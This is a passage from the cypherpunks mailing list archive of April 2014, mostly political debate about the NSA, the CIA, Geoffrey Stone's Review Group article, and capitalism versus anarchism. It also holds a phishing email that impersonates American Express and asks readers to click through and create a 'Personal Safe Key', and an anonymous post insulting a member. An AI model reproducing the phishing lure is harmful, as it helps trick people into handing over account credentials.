LNHBkcNDkfCxiPemzrzqnIKwfBGan2HqiFGff9K0ATjFuK/2Rb+xDtTwwfv2sAbs ohuhrA5A0MHqryXJDEFaP5bv+zHoRd/I7V08hijxTLKo/0VdCR89R8GAs5eOYBjj nQffL5/0Ikn7v95ez7z7 =zHw7 -----END PGP SIGNATURE----- From juan.g71 at gmail.com Thu Apr 3 12:22:11 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Thu, 03 Apr 2014 16:22:11 -0300 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: --On Thursday, April 03, 2014 8:09 AM -0400 John Young wrote: > The CIA is the principal customer of NSA products outside > the military. When global cyber spying Cybercom was proposed > NSA did not want to do it, claiming it exceeded NSA's military > mission. That doesn't sound like something John Young would write. The idea that the US military, who are the ones really running the show, woudn't want to increase their power is just...too exceedingly naive. > However, the pols, and CIA, wanted that very excess, > in particular for spying inside the US, ostensibly banned for the > CIA but now needed for terrorists inside. > > CIA (long FBI opponents) thought FBI could not cope with inside > terrorists, using 9/11 as an example, and advocated NSA involvement > with its much greater technical capability, but more importantly, its > military-privileged secrecy not susceptible to full congressional > oversight, courts and FOIA. > > The joint CIA-NSA Special Collection Service (SCS) has > been doing for decades what NSA is now alone accused of doing: > CIA provided the targets, NSA did the technical collection from > those global stations identified by xKeyscore (most in embassies > or nearby). > > What is bizarre is how little CIA is mentioned in news furor about > NSA, as if NSA did its work in isolation from the IC and without > oversight of the 3 branches. > > SCS also does burglaries, code snatches, decrypts, doc drops, > stings, ploys, blackmail, the panoply of CIA operations. The increased > civilian target panoply bestowed upon NSA came from CIA demands > channeled through ODNI. > > Reviewing what little has been released of the Snowden documents > they are quite similar to what SCS has been doing with the addition > of the US as target. FISA had to be rejiggered for the US domain. > > Most national leaders, like POTUS, are considered to be military > commanders thus fair game for NSA along with CIA. Nothing > exceptional about the recent revelations of spying on chiefs of > state. > > NSA technical collection capability was developed for the > military, not civilian use. Now expanded to CIA full dominance > territory. FISA had to be rejiggered for using it against civilians. > And is still being rejiggered these days. > > NSA's recent attempt to slough off Cybercom and return to > its military mission, has been rejected by the civilian overseers > following CIA guidance and fear-mongering of civilians, especially > those inside the US. The last thing CIA and its supporters want > is a revelation of its manipulation of civilian leaders institutionalized > by the 1947 National Security Act (also opposed by the military). > > ----- > > > At 10:56 PM 4/2/2014, DG wrote on cypherpunks: > >> [ disclaimer, Geoff Stone is a friend of mine ] >> >> >> www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.ht >> ml?utm_hp_ref=technology&ir=Technology >> >> What I Told the NSA >> >> Because of my service on the President's Review Group last fall, >> which made recommendations to the president about NSA surveillance >> and related issues, the NSA invited me to speak today to the NSA >> staff at the NSA headquarters in Fort Meade, Maryland, about my >> work on the Review Group and my perceptions of the NSA. Here, >> in brief, is what I told them: >> >> From the outset, I approached my responsibilities as a member >> of the Review Group with great skepticism about the NSA. I am >> a long-time civil libertarian, a member of the National Advisory >> Council of the ACLU, and a former Chair of the Board of the >> American Constitution Society. To say I was skeptical about >> the NSA is, in truth, an understatement. >> >> I came away from my work on the Review Group with a view of >> the NSA that I found quite surprising. Not only did I find >> that the NSA had helped to thwart numerous terrorist plots >> against the United States and its allies in the years since >> 9/11, but I also found that it is an organization that operates >> with a high degree of integrity and a deep commitment to the >> rule of law. >> >> Like any organization dealing with extremely complex issues, >> the NSA on occasion made mistakes in the implementation of its >> authorities, but it invariably reported those mistakes upon >> discovering them and worked conscientiously to correct its >> errors. The Review Group found no evidence that the NSA had >> knowingly or intentionally engaged in unlawful or unauthorized >> activity. To the contrary, it has put in place carefully-crafted >> internal proceduresto ensure that it operates within the bounds >> of its lawful authority. >> >> This is not to say that the NSA should have had all of the >> authorities it was given. The Review Group found that many of >> the programs undertaken by the NSA were highly problematic and >> much in need of reform. But the responsibility for directing >> the NSA to carry out those programs rests not with the NSA, >> but with the Executive Branch, the Congress, and the Foreign >> Intelligence Surveillance Court, which authorized those programs >> -- sometimes without sufficient attention to the dangers they >> posed to privacy and civil liberties. The NSA did its job -- >> it implemented the authorities it was given. >> >> It gradually became apparent to me that in the months after >> Edward Snowden began releasing information about the government's >> foreign intelligence surveillance activities, the NSA was being >> severely -- and unfairly -- demonized by its critics. Rather >> than being a rogue agency that was running amok in disregard >> of the Constitution and laws of the United States, the NSA was >> doing its job. It pained me to realize that the hard-working, >> dedicated, patriotic employees of the NSA, who were often >> working for far less pay than they could have earned in the >> private sector because they were determined to help protect >> their nation from attack, were being castigated in the press >> for the serious mistakes made, not by them, but by Presidents, >> the Congress, and the courts. >> >> Of course, "I was only following orders" is not always an >> excuse. But in no instance was the NSA implementing a program >> that was so clearly illegal or unconstitutional that it would >> have been justified in refusing to perform the functions >> assigned to it by Congress, the President, and the Judiciary. >> Although the Review Group found that many of those programs >> need serious re-examination and reform, none of them was so >> clearly unlawful that it would have been appropriate for the >> NSA to refuse to fulfill its responsibilities. >> >> Moreover, to the NSA's credit, it was always willing to engage >> the Review Group in serious and candid discussions about the >> merits of its programs, their deficiencies, and the ways in >> which those programs could be improved. Unlike some other >> entities in the intelligence community and in Congress, the >> leaders of the NSA were not reflexively defensive, but were >> forthright, engaged, and open to often sharp questions about >> the nature and implementation of its programs. >> >> To be clear, I am not saying that citizens should trust the >> NSA. They should not. Distrust is essential to effective >> democratic governance. The NSA should be subject to constant >> and rigorous review, oversight, scrutiny, and checks and >> balances. The work it does, however important to the safety >> of the nation, necessarily poses grave dangers to fundamental >> American values, particularly if its work is abused by persons >> in positions of authority. If anything, oversight of the NSA >> -- especially by Congress -- should be strengthened. The future >> of our nation depends not only on the NSA doing its job, but >> also on the existence of clear, definitive, and carefully >> enforced rules and restrictions governing its activities. >> >> In short, I found, to my surprise, that the NSA deserves the >> respect and appreciation of the American people. But it should >> never, ever, be trusted. > > > > > > > > From cypher at cpunk.us Thu Apr 3 14:22:21 2014 From: cypher at cpunk.us (Cypher) Date: Thu, 03 Apr 2014 16:22:21 -0500 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> Message-ID: <533DD10D.8090005@cpunk.us> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/03/2014 03:49 PM, Cari Machet wrote: > > >> Do capitalists upset you? > > >> CAPITALISTS have no concept of reality and are completely self >> serving yes that is upsetting to my sensibilities and >> consciousness > > Which is *precisely* why I would trust information provided to me > by a capitalist than that provided to me by an idealist. > > >> i am a fucking anarchist which by the words you use in your >> writing that point to your low level concepts - you probably have >> no clue about > >> you are a capitalist - making frames for others to fit your >> fucking lame ass argument - pathetic Actually, Cari, I've done a pretty extensive foray into Anarchism. It's an interesting but, IMHO, completely unworkable system populated by people who dream of a better, freer world, but have no chance of actually creating it - not now at least. What turned me off about Anarchism were people like you. People who waved their moral superiority flag every chance they got and assumed that anyone who supported a different view than theirs was ignorant or didn't understand what Anarchy is. In a lot of cases, Anarchists are their own worst enemy. > A capitalist sees everything as a product that will either further > his desire for success or hinder it. An idealist sees everything as > a mission fitting within their narrow agenda. A capitalist has much > more incentive to provide a good product (correct, accurate, > information) than an idealist who's sole goal is to further an > agenda. Both have their uses though and both can be manipulated to > good and bad ends. > > >> an anarchist DOES NOT generally have one goal - capitalists think >> that way anarchists are node based thinkers capitalist are >> monolithic thinkers and often frame things in a dualistic or >> black and white manner which is very christian religion in form >> and thought pattern Well, Cari, from what I've seen from the Anarchist community, the main goal that anarchist have is to abolish the state. This, of course, is a means to an end (the end being personal freedom) but the goal seems to be nearly single-minded focus on abolishing the state. And yes, I know some anarchists will say 'some of us simply ignore the state' and that's true. But, in reality, the main 'collective' goal (and I use that term loosely) is to abolish the state. To confirm this, just talk to any anarchist and ask them what the biggest problem to humanity is. Most will stay 'the state'. How do you solve it? 'Work to abolish the state'. Seems pretty single minded to me. But, please, instead of ranting and wild arm-waving, educate me if I am wrong. I would certainly /love/ to see a workable, large scale, anarchistic plan. I admit I probably don't know as much about the philosophy as you do. But, instead of just angrily cursing, why not try to educate me? I know that's a bit harder than angry arm-waving and cursing but it's probably more productive. >> capitalism is an economic model that has severe ramifications >> for society it is no different than having a monarch really there >> is a degree of difference regarding poverty but ... i heard today >> that if you are dying of cancer in uganda you have a 10% chance >> of having access to morphine ... they give cancer patients >> paracetamol ... thats your great capitalism i find it disgusting >> Actually, that /isn't/ capitalism. Why do you think what you read is the case? Maybe it's because of deals cut between governments and corporations? Do you know what we call that intertwining? No, we don't call it capitalism. We call is /fascism/. >> the careerist journalists laura poitras et al are capitalistic >> in every way - exploitive > > I disagree. The careerist journalists are "crony capitalists" in > every way. > >> listen i am an activist journalist making money / becoming famous >> like them off of journalism in the way they do it is not ok with >> me its not how i would ever in a million years do my work And /that/ is one of the great things about capitalism: you can try different things. You don't have to be confined to one narrow model. You don't agree with it? Great! Go do something your way and nobody is likely to stop you (except the predatory crony capitalists, but I think we've established those aren't real capitalists, right?) > They know that, regardless of the accuracy of their information, > the 'other side of the coin' will smooth things over and keep the > public hooked on an inferior product. That's not a true > capitalist. > > >> i think your an idealist actually 'true capitalism' thats a >> theory Perhaps I am. Just like a Utopian anarchistic society is a theory that's never been proven. It's a different way of thinking, each with positives and negatives. I think we're probably /both/ idealists in our own ways. > That's one of my main arguments with socialists and other > non-capitalist believers: > > >> BELIEVERS????????? LMAO > >> i dont believe in belief that is religious You don't believe in the power of your anarchistic philosophy? Hmm, perhaps that's the problem then! I assume, being a journalist, you understand that words have multiple meanings and we use them withing 'contexts'. Using the word 'believe' in the context I did doesn't have religious connotations at all. But I bet you know that. It looks like you are upset and just lashing out at everything because we don't agree. That's alright. I've seen your posts here and know you're more intelligent than that. So, yes, you're a 'believer' or...at least...you should be. > they point to our current system and say 'see, it's exploitive and > hurts people!' and it does. But that's not a true capitalist > system. Will we ever actually have one? Doubtful. But what we have > now is definitely not a good example. > > >> i dont think you understand that capitalism is well beyond an >> economy - watch naomi klein Oh I understand it very well. I suspect it's you, who's obviously stuck within a very narrow worldview, who may not understand it. I've read Ms. Klein and I like a lot of her work - I don't agree with all of it, but I like it. But you know as well as I do that she comes at the topic with a bias. Also, from what I've read, her main beef seems to be with globalization and the influence corporations have on governments and, thus, the people. Remember, we've already covered this: it's not capitalism but /fascism/ when you have that. Do you have any thing in particular by Ms. Klein you'd like me to read that may help 'educate' me? I'd be happy to give it a go. So far, I've only read "No Logo", "The Take", and "The Shock Doctrine". Anything else I should pick up? >> https://www.youtube.com/watch?v=Ka3Pb_StJn4 Yep, saw this video series. Brilliant woman, great book. Still talking largely about fascism and not capitalism. I mean, sure, she uses the /word/ 'capitalism' but that's not what she's describing. She's talking fascism. >> with capitalism the iraq invasion happened within its frame > >> black sites torture sites around the globe where conducted within >> the frame of capitalism > gitmo 'lives' inside the frame of >> capitalism So, do you believe that the horrible things that happened in Iraq and GITMO wouldn't have happened if the corporations weren't involved? I agree that they probably wouldn't have happened on such a /massive/ scale simply because their would have been a manpower shortage but I suspect some of those 'true blue' soldiers wouldn't have had much of a problem picking up a chemical light and sticking it up someone's ass...or raping them. Were the naked pictures of prisoners at Abu Ghraib capitalism at work too? Oh, wait, those were soldiers, not businessment trying to make money. >> i dont think you understand anarchy or anarchistic thought >> processies at all I certainly admit that I don't understand it as much as /you/ do or many others who spend a good amount of their time researching and reading anarchistic thought. But I do have a good understanding of it. However, feel free to point me in the direction of some good educational material. I'll read it happily! I like exploring different thoughts. I actually /like/ the idea of anarchy, just like I like much of the ideas of socialism. But they both, IMHO, fall a bit off the mark. That might be an educational thing that can be fixed though so feel free to point me in the right direction. No sarcasm intended here, I am open to learning! Cypher -----BEGIN PGP SIGNATURE----- Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iQIcBAEBCgAGBQJTPdEAAAoJEFuutbL6JoJrTmkP/2sH2LYqKN620/tkbZOT0fjD /JBsbumLknFOUL7ZpYcfa+Nh+2SOLTOFDX7GxuUckbHnkUtjAZgrXKcB+aoMYbMp NOZrufIp4lcOZo7a/5DWRlU4gYRH0FtYxkpDP06lLxWDHFQ0vCujflrifGiMidPU Ln4ATUy/wcT+OBDk+l3bWvoH3N9M2HQ9Ib/VaIcoyK6QOKLCKlMuKu+ft2PPK1nz n9NPFyEFFkLzs7uJZh+s0UYPHAJSJbB0pd/IBQ3NA3U8DfJBbQmH9SWOmNTFTBdo z8CFCem4smbUvyn208HQ1dyDArY400GnOx2Y20bADB+YO0g62CSmKEshPhPSRmDG bI4LnyUICrJ0rRKU/FzQLCTEtWNeRGAY8JhbMgQVShpqfcWl4TTL745b+FEk04QO Ikpnb2k+1zuGa+lDi4Xp9Lv0fxSW3W0j+w+t9o+u+0K/fOWkF7Gx/uB9G0/oynOb /sFMsvaUOcx7a879bHa88rr4mH5L5puCjTOeAUBkyC39jxcTRFvLEw4Sai1Q9mEY ZODFhA1BSgVJungKYLpqevIIyVlsKJW9LK8+ov8i2WDF2ygq1EqI+3iOwoKxFfmC EO9XdHUYtGtPsQKqh5ldl7rGQWYxu3J+FatmVhwGKCEdVer+yP/f5gT1h4SjrHVp x67TKKhVf3r2CYcZyZmw =gX6E -----END PGP SIGNATURE----- From rysiek at hackerspace.pl Thu Apr 3 07:25:24 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 16:25:24 +0200 Subject: Google can grow up to not be evil In-Reply-To: <533D24D0.5080308@cathalgarvey.me> References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me> Message-ID: <6578247.InOOgvZAbe@lap> Dnia czwartek, 3 kwietnia 2014 10:07:28 Cathal Garvey pisze: > Keep reading: > "Fukushima is the result of, we believe, a nuke that blew up the reactor > and another that set off the tsunami - the result of a war WITHIN the > CIA. We believe many public ‘leaders’ are involved." > > ..I don't even Well FINALLY! I was waiting for a decent conspiracy theory around Fukushima for years. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From l at odewijk.nl Thu Apr 3 07:58:22 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Thu, 3 Apr 2014 16:58:22 +0200 Subject: Google can grow up to not be evil In-Reply-To: <6578247.InOOgvZAbe@lap> References: <533C3DE9.5090308@rayservers.net> <1018994096.42779.1396468699217.JavaMail.www@wwinf8226> <533D24D0.5080308@cathalgarvey.me> <6578247.InOOgvZAbe@lap> Message-ID: 2014-04-03 16:25 GMT+02:00 rysiek : > Dnia czwartek, 3 kwietnia 2014 10:07:28 Cathal Garvey pisze: > > Keep reading: > > "Fukushima is the result of, we believe, a nuke that blew up the reactor > > and another that set off the tsunami - the result of a war WITHIN the > > CIA. We believe many public ‘leaders’ are involved." > > > > ..I don't even > > Well FINALLY! I was waiting for a decent conspiracy theory around Fukushima > for years. > Terribly weak nuke to leave the reactor /just/ intact enough to make it SEEM like an earthquake + tsunami, while IN FACT it WAS a nuke! -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1059 bytes Desc: not available URL: From pc at loom.cc Thu Apr 3 13:59:34 2014 From: pc at loom.cc (Patrick Chkoreff) Date: Thu, 03 Apr 2014 16:59:34 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> Message-ID: <533DCBB6.8080902@loom.cc> Cari Machet wrote, On 04/03/2014 03:48 PM: > nobody 'owns' anything Ownership is an exclusive right of use or disposal. If I wake up one morning and find you in my house eating my food, you-gonna be in big trouble Lucy. From tpb-crypto at laposte.net Thu Apr 3 08:34:20 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Thu, 03 Apr 2014 17:34:20 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: <740996795.264257.1396539260669.JavaMail.www@wwinf8307> > Message du 03/04/14 16:54 > De : "Cari Machet" > > > Not that journalists should be expected > > to make a lasting difference. > > > > > WTF? > > this shit was posted on huffington post probably for those without ad > blocker there was ad with bewbs on it next to the text > > one more thing why do you assume to know the minds of the people that own > the snowden data - they are capitalists - that is all > Do capitalists upset you? From carimachet at gmail.com Thu Apr 3 12:48:28 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 19:48:28 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <740996795.264257.1396539260669.JavaMail.www@wwinf8307> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> Message-ID: On Thu, Apr 3, 2014 at 3:34 PM, wrote: > > Message du 03/04/14 16:54 > > De : "Cari Machet" > > > > > Not that journalists should be expected > > > to make a lasting difference. > > > > > > > > WTF? > > > > this shit was posted on huffington post probably for those without ad > > blocker there was ad with bewbs on it next to the text > > > > one more thing why do you assume to know the minds of the people that own > > the snowden data - they are capitalists - that is all > > > > Do capitalists upset you? > CAPITALISTS have no concept of reality and are completely self serving yes that is upsetting to my sensibilities and consciousness why do you frame things emotionally - i have thoughts you know umn logic? the careerist journalists laura poitras et al are capitalistic in every way - exploitive serious fucking white ownership distortion fucked up shit > nobody 'owns' anything she fucking slapped a copyright on the end of her recording of snowden in hong kong and on mannings providence statement she put a cc with attribution - fuck off mannings words are not yours to slap your fucking name on -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2556 bytes Desc: not available URL: From mixmaster at remailer.privacy.at Thu Apr 3 10:53:32 2014 From: mixmaster at remailer.privacy.at (Anonymous Remailer (austria)) Date: Thu, 3 Apr 2014 19:53:32 +0200 (CEST) Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist) Message-ID: Cari Machet is our resident soft in the head fake indian leftist who cant spell!! DONT expect logic or rational thought from this entity.. anon From carimachet at gmail.com Thu Apr 3 13:12:12 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 20:12:12 +0000 Subject: Geoff Stone, Obama's Review Group - Part 2 In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> Message-ID: On Thu, Apr 3, 2014 at 7:22 PM, Juan Garofalo wrote: > > > --On Thursday, April 03, 2014 8:09 AM -0400 John Young > wrote: > > > The CIA is the principal customer of NSA products outside > > the military. When global cyber spying Cybercom was proposed > > NSA did not want to do it, claiming it exceeded NSA's military > > mission. > > > That doesn't sound like something John Young would write. > > The idea that the US military, who are the ones really running the > show, > woudn't want to increase their power is just...too exceedingly naive. > yay to think the military would not want to expand its mandate when rummy fought so hard for them to get ahead of the cia ... competition is weird though it is possible - what are the thoughts on the cia as opposed to the military running the drone program in this regard ? the pentagon was gonna run it then it was decided no... the competition between different agencies in the us is bazzzarrio i cannot imagine how they deal with all the subcontractors - i am sure they figure out ways to be cruel to them the thing is that there are different entities 'running the show' mostly its your good ole transnational corporations and fucking autocrats - basic mafia shit the junta aspect of the so called gov is just an arm of the transnationals... ever been to the straight of hormuz? to put the military beyond the transnationals is beyond naive its complete blindness > > > > > However, the pols, and CIA, wanted that very excess, > > in particular for spying inside the US, ostensibly banned for the > > CIA but now needed for terrorists inside. > > > > CIA (long FBI opponents) thought FBI could not cope with inside > > terrorists, using 9/11 as an example, and advocated NSA involvement > > with its much greater technical capability, but more importantly, its > > military-privileged secrecy not susceptible to full congressional > > oversight, courts and FOIA. > > > > The joint CIA-NSA Special Collection Service (SCS) has > > been doing for decades what NSA is now alone accused of doing: > > CIA provided the targets, NSA did the technical collection from > > those global stations identified by xKeyscore (most in embassies > > or nearby). > > > > What is bizarre is how little CIA is mentioned in news furor about > > NSA, as if NSA did its work in isolation from the IC and without > > oversight of the 3 branches. > > > > SCS also does burglaries, code snatches, decrypts, doc drops, > > stings, ploys, blackmail, the panoply of CIA operations. The increased > > civilian target panoply bestowed upon NSA came from CIA demands > > channeled through ODNI. > > > > Reviewing what little has been released of the Snowden documents > > they are quite similar to what SCS has been doing with the addition > > of the US as target. FISA had to be rejiggered for the US domain. > > > > Most national leaders, like POTUS, are considered to be military > > commanders thus fair game for NSA along with CIA. Nothing > > exceptional about the recent revelations of spying on chiefs of > > state. > > > > NSA technical collection capability was developed for the > > military, not civilian use. Now expanded to CIA full dominance > > territory. FISA had to be rejiggered for using it against civilians. > > And is still being rejiggered these days. > > > > NSA's recent attempt to slough off Cybercom and return to > > its military mission, has been rejected by the civilian overseers > > following CIA guidance and fear-mongering of civilians, especially > > those inside the US. The last thing CIA and its supporters want > > is a revelation of its manipulation of civilian leaders institutionalized > > by the 1947 National Security Act (also opposed by the military). > > > > ----- > > > > > > At 10:56 PM 4/2/2014, DG wrote on cypherpunks: > > > >> [ disclaimer, Geoff Stone is a friend of mine ] > >> > >> > >> > www.huffingtonpost.com/geoffrey-r-stone/what-i-told-the-nsa_b_5065447.ht > >> ml?utm_hp_ref=technology&ir=Technology > >> > >> What I Told the NSA > >> > >> Because of my service on the President's Review Group last fall, > >> which made recommendations to the president about NSA surveillance > >> and related issues, the NSA invited me to speak today to the NSA > >> staff at the NSA headquarters in Fort Meade, Maryland, about my > >> work on the Review Group and my perceptions of the NSA. Here, > >> in brief, is what I told them: > >> > >> From the outset, I approached my responsibilities as a member > >> of the Review Group with great skepticism about the NSA. I am > >> a long-time civil libertarian, a member of the National Advisory > >> Council of the ACLU, and a former Chair of the Board of the > >> American Constitution Society. To say I was skeptical about > >> the NSA is, in truth, an understatement. > >> > >> I came away from my work on the Review Group with a view of > >> the NSA that I found quite surprising. Not only did I find > >> that the NSA had helped to thwart numerous terrorist plots > >> against the United States and its allies in the years since > >> 9/11, but I also found that it is an organization that operates > >> with a high degree of integrity and a deep commitment to the > >> rule of law. > >> > >> Like any organization dealing with extremely complex issues, > >> the NSA on occasion made mistakes in the implementation of its > >> authorities, but it invariably reported those mistakes upon > >> discovering them and worked conscientiously to correct its > >> errors. The Review Group found no evidence that the NSA had > >> knowingly or intentionally engaged in unlawful or unauthorized > >> activity. To the contrary, it has put in place carefully-crafted > >> internal proceduresto ensure that it operates within the bounds > >> of its lawful authority. > >> > >> This is not to say that the NSA should have had all of the > >> authorities it was given. The Review Group found that many of > >> the programs undertaken by the NSA were highly problematic and > >> much in need of reform. But the responsibility for directing > >> the NSA to carry out those programs rests not with the NSA, > >> but with the Executive Branch, the Congress, and the Foreign > >> Intelligence Surveillance Court, which authorized those programs > >> -- sometimes without sufficient attention to the dangers they > >> posed to privacy and civil liberties. The NSA did its job -- > >> it implemented the authorities it was given. > >> > >> It gradually became apparent to me that in the months after > >> Edward Snowden began releasing information about the government's > >> foreign intelligence surveillance activities, the NSA was being > >> severely -- and unfairly -- demonized by its critics. Rather > >> than being a rogue agency that was running amok in disregard > >> of the Constitution and laws of the United States, the NSA was > >> doing its job. It pained me to realize that the hard-working, > >> dedicated, patriotic employees of the NSA, who were often > >> working for far less pay than they could have earned in the > >> private sector because they were determined to help protect > >> their nation from attack, were being castigated in the press > >> for the serious mistakes made, not by them, but by Presidents, > >> the Congress, and the courts. > >> > >> Of course, "I was only following orders" is not always an > >> excuse. But in no instance was the NSA implementing a program > >> that was so clearly illegal or unconstitutional that it would > >> have been justified in refusing to perform the functions > >> assigned to it by Congress, the President, and the Judiciary. > >> Although the Review Group found that many of those programs > >> need serious re-examination and reform, none of them was so > >> clearly unlawful that it would have been appropriate for the > >> NSA to refuse to fulfill its responsibilities. > >> > >> Moreover, to the NSA's credit, it was always willing to engage > >> the Review Group in serious and candid discussions about the > >> merits of its programs, their deficiencies, and the ways in > >> which those programs could be improved. Unlike some other > >> entities in the intelligence community and in Congress, the > >> leaders of the NSA were not reflexively defensive, but were > >> forthright, engaged, and open to often sharp questions about > >> the nature and implementation of its programs. > >> > >> To be clear, I am not saying that citizens should trust the > >> NSA. They should not. Distrust is essential to effective > >> democratic governance. The NSA should be subject to constant > >> and rigorous review, oversight, scrutiny, and checks and > >> balances. The work it does, however important to the safety > >> of the nation, necessarily poses grave dangers to fundamental > >> American values, particularly if its work is abused by persons > >> in positions of authority. If anything, oversight of the NSA > >> -- especially by Congress -- should be strengthened. The future > >> of our nation depends not only on the NSA doing its job, but > >> also on the existence of clear, definitive, and carefully > >> enforced rules and restrictions governing its activities. > >> > >> In short, I found, to my surprise, that the NSA deserves the > >> respect and appreciation of the American people. But it should > >> never, ever, be trusted. > > > > > > > > > > > > > > > > > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12612 bytes Desc: not available URL: From AmericanExpress at welcome.aexp.com Thu Apr 3 09:52:06 2014 From: AmericanExpress at welcome.aexp.com (American Express Customer Service) Date: Thu, 3 Apr 2014 20:22:06 +0330 Subject: American Express - Safe Key Message-ID: <7NHJIRJOMO7Z4P1ZF3N4SZ847RCRYC@aexp.com> Safe Key Create your safe key now Please create your Personal Security Key. Personal Safe Key (PSK) is one of several authentication measures we utilize to ensure we are conducting business with you, and only you, when you contact us for assistance. American Express uses 128-bit Secure Sockets Layer (SSL) technology. This means that when you are on our secured website the data transferred between American Express and you is encrypted and cannot be viewed by any other party. The security of your personal information is of the utmost importance to American Express, please click here to create your PSK (Personal Safe Key). Note: You will be redirected to a secure encrypted website. The contained message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. Sincerely, American Express Customer Service Contact Customer Service | View Our Privacy Statement | Add Us to Your Address Book This is a customer service e-mail from American Express. Using the spam/junk mail function may not block servicing messages from being sent to your email account. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress.com/phishing. We kindly ask you not to reply to this e-mail but instead contact us securely via customer service. American Express. All rights reserved. DTWEUSDP3709309 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7488 bytes Desc: not available URL: From rysiek at hackerspace.pl Thu Apr 3 11:31:46 2014 From: rysiek at hackerspace.pl (rysiek) Date: Thu, 03 Apr 2014 20:31:46 +0200 Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist) In-Reply-To: References: Message-ID: <1575193.mOTzX8i2Ad@lap> Dnia czwartek, 3 kwietnia 2014 19:53:32 Anonymous Remailer pisze: > Cari Machet is our resident soft in the head fake indian leftist who cant > spell!! > > DONT expect logic or rational thought from this entity.. http://1.bp.blogspot.com/-Rc8k_D3yYoE/Tw4IyOKMysI/AAAAAAAAAls/awgasVzJMfA/s320/Stephen-Colbert-Popcorn.gif -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From carimachet at gmail.com Thu Apr 3 13:49:40 2014 From: carimachet at gmail.com (Cari Machet) Date: Thu, 3 Apr 2014 20:49:40 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533DBDDD.8050102@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> Message-ID: On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > On 04/03/2014 02:48 PM, Cari Machet wrote: > > > > > > > > On Thu, Apr 3, 2014 at 3:34 PM, > > wrote: > > > >> Message du 03/04/14 16:54 De : "Cari Machet" > >> > >>> Not that journalists should be expected to make a lasting > >>> difference. > >>> > >>> > >> WTF? > >> > >> this shit was posted on huffington post probably for those > >> without ad blocker there was ad with bewbs on it next to the > >> text > >> > >> one more thing why do you assume to know the minds of the people > > that own > >> the snowden data - they are capitalists - that is all > >> > > > > Do capitalists upset you? > > > > > > CAPITALISTS have no concept of reality and are completely self > > serving yes that is upsetting to my sensibilities and > > consciousness > > Which is *precisely* why I would trust information provided to me by a > capitalist than that provided to me by an idealist. i am a fucking anarchist which by the words you use in your writing that point to your low level concepts - you probably have no clue about you are a capitalist - making frames for others to fit your fucking lame ass argument - pathetic > A capitalist sees > everything as a product that will either further his desire for > success or hinder it. An idealist sees everything as a mission fitting > within their narrow agenda. A capitalist has much more incentive to > provide a good product (correct, accurate, information) than an > idealist who's sole goal is to further an agenda. Both have their uses > though and both can be manipulated to good and bad ends. > an anarchist DOES NOT generally have one goal - capitalists think that way anarchists are node based thinkers capitalist are monolithic thinkers and often frame things in a dualistic or black and white manner which is very christian religion in form and thought pattern capitalism is an economic model that has severe ramifications for society it is no different than having a monarch really there is a degree of difference regarding poverty but ... i heard today that if you are dying of 